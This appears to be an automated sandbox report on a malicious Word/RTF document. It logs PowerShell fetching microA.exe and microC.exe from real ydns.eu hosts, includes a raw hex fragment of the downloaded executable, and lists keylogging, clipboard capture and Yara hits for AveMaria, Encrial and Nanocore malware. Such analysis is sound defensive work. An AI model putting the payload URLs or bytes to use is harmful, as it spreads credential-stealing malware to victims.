02 00 00 04 02 20 c7 84 f2 fd 7d 03 00 00 04 02 18 7d 02 00 00 04 17 2a 02 15 7d 02 00 00 04 02 02 7b 05 00 00 04 20 86 e4 dd 4e 61 7d 03 00 00 04 02 19 7d 02 00 00 04 17 2a 02 15 7d 02 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:46:50 GMTContent-Length: 1378816Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW, 16_2_0040290E
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BDD4F7-5649-4CA3-B477-D1894D362AA0}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: newhosteeeee.ydns.eu
Source: powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp String found in binary or memory: httP://newhosteeeee.ydn
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp String found in binary or memory: httP://newhosteeeee.ydns.eu/micr
Source: powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2101479507.0000000000654000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2101084138.0000000000413000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2101559005.0000000001C26000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: httP://newhosteeeee.ydns.eu/microA.exe
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp String found in binary or memory: httP://newhosteeeee.ydns.eu/microA.exePE
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp String found in binary or memory: http://newhosteeeee.ydns.eu
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.2111095740.000000001B4F0000.00000004.00000001.sdmp String found in binary or memory: http://newhosteeeee.ydns.eu/microA.exe
Source: powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000003.00000002.2099858527.00000000003CE000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://w
Source: powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.comJ
Source: microA.exe, images.exe String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\images.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\images.exe
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCCBD0 GetOpenClipboardWindow, 25_2_03BCCBD0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx, 16_2_0040813A
Installs a raw input device (often for capturing keystrokes)
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud:

barindex
Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 16_2_00413695

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2368726413.0000000002502000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000024.00000002.2374416119.0000000003777000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing when opening. 0 Words: 19 N@m 13 ;a 10096 G) FI G) ,, ' I :j I ;; ] " mtub
Source: Screenshot number: 12 Screenshot OCR: Enable Editing when opening. ii: ^ a S
Found suspicious RTF objects
Source: abdtfhgXgdghgh.ScT Static RTF information: Object: 0 Offset: 00000961h abdtfhgXgdghgh.ScT
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT Jump to behavior
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Jump to dropped file
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\microA.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\ProgramData\images.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\ProgramData\images.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 16_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 17_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 18_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 25_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFA3D5 UserRegisterWowHandlers,NtVdmControl, 25_2_03BFA3D5
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC53D2 NtCallbackReturn, 25_2_03BC53D2
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C0E2BA GetCurrentThread,NtOpenThreadToken,NtQueryInformationToken,CloseHandle,GetCurrentProcessId,ProcessIdToSessionId,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,NtRaiseHardError, 25_2_03C0E2BA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C011B0 RecordShutdownReason,NtOpenThreadToken,NtOpenThreadToken,NtOpenThreadToken,NtOpenProcessToken,NtClose,NtClose,RtlAllocateHeap,CsrAllocateCaptureBuffer,RtlAllocateHeap,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrClientCallServer,CsrFreeCaptureBuffer,RtlFreeHeap,RtlFreeHeap, 25_2_03C011B0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF912F WaitForInputIdle,NtQueryInformationProcess, 25_2_03BF912F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE124 MultiByteToWideChar,NtCallbackReturn, 25_2_03BDE124
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB810B NtCallbackReturn, 25_2_03BB810B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFB107 RtlOpenCurrentUser,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,NtClose,NtClose,RtlInitUnicodeString,NtOpenKey,NtClose,NtClose,RtlInitUnicodeString,NtQueryValueKey,wcstoul,RtlInitUnicodeString,NtCreateKey,RtlInitUnicodeString,NtSetValueKey,NtClose,RtlInitUnicodeString,NtDeleteValueKey,NtClose, 25_2_03BFB107
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC20B0 NtCallbackReturn, 25_2_03BC20B0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C010BF CreateThread,GetExitCodeThread,NtClose, 25_2_03C010BF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE019 RtlFreeHeap,NtCallbackReturn,RtlAllocateHeap,RtlAllocateHeap,memcpy,RtlAllocateHeap,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap, 25_2_03BDE019
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC7044 PeekMessageA,NtYieldExecution, 25_2_03BC7044
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDB7F5 NtCallbackReturn, 25_2_03BDB7F5
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF47EB NtClose,RtlInitUnicodeString,NtQueryValueKey, 25_2_03BF47EB
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCA7DE NtCallbackReturn, 25_2_03BCA7DE
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC9719 NtCallbackReturn, 25_2_03BC9719
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC36BC NtCallbackReturn, 25_2_03BC36BC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBB6FA FreeLibrary,FreeLibrary,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,EntryPoint,DisableThreadLibraryCalls,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,NtQuerySystemInformation,GetModuleHandleW,FindResourceExA,FindResourceExW,LoadStringBaseExW,LoadResource,SizeofResource,RegisterWaitForInputIdle,GdiDllInitialize,QueryActCtxSettingsW,FreeLibrary, 25_2_03BBB6FA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBA6E0 NtCallbackReturn, 25_2_03BBA6E0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE66F NtCallbackReturn, 25_2_03BDE66F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFA666 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlInitUnicodeString,RtlUnicodeStringToInteger,LoadLibraryW,FreeLibrary,GetProcAddress,NtClose,LoadLibraryW,GetProcAddress,GetModuleFileNameW,FreeLibrary,CreateFileW, 25_2_03BFA666
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC55AA NtCallbackReturn, 25_2_03BC55AA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF95FC NtClose, 25_2_03BF95FC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB85E8 NtCallbackReturn, 25_2_03BB85E8
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC05D2 PeekMessageW,NtYieldExecution, 25_2_03BC05D2
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C1A540 NtQuerySystemInformation, 25_2_03C1A540
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE53B NtCallbackReturn, 25_2_03BDE53B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C00551 NtQueryInformationProcess, 25_2_03C00551
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF9503 SetUserObjectSecurity,NtSetSecurityObject, 25_2_03BF9503
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC04B6 NtOpenDirectoryObject,NtClose,RtlInitUnicodeString, 25_2_03BC04B6
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C174E6 _wcsicmp,wcsncpy_s,wcsncpy_s,memset,CreateProcessW,NtClose,NtClose,NtClose, 25_2_03C174E6
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC548F NtCallbackReturn, 25_2_03BC548F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF94CD GetUserObjectSecurity,NtQuerySecurityObject, 25_2_03BF94CD
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C15472 _UserTestTokenForInteractive,NtQueryInformationToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap, 25_2_03C15472
